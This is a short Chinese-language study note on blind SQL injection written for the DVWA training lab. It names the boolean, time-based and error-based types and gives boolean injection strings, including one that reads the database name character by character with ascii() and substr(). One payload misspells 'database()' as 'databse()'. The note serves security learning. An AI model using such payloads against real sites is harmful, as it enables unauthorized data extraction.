@Dukebf
2017-07-12T00:03:30.000000Z
字数 225
阅读 1338
SQL注入
前人轮子
DVWA-1.9全级别教程之SQL Injection(Blind)
盲注分为基于布尔的盲注、基于时间的盲注以及基于报错的盲注.
布尔盲注: 1' and 1=1
select * from userID where id='1' and 1=1
拆解名字获取字段,可以利用ascii() 和 substr() 函数,通过二分法获取到。
1' and ascii(substr(databse(),1,1)) > 97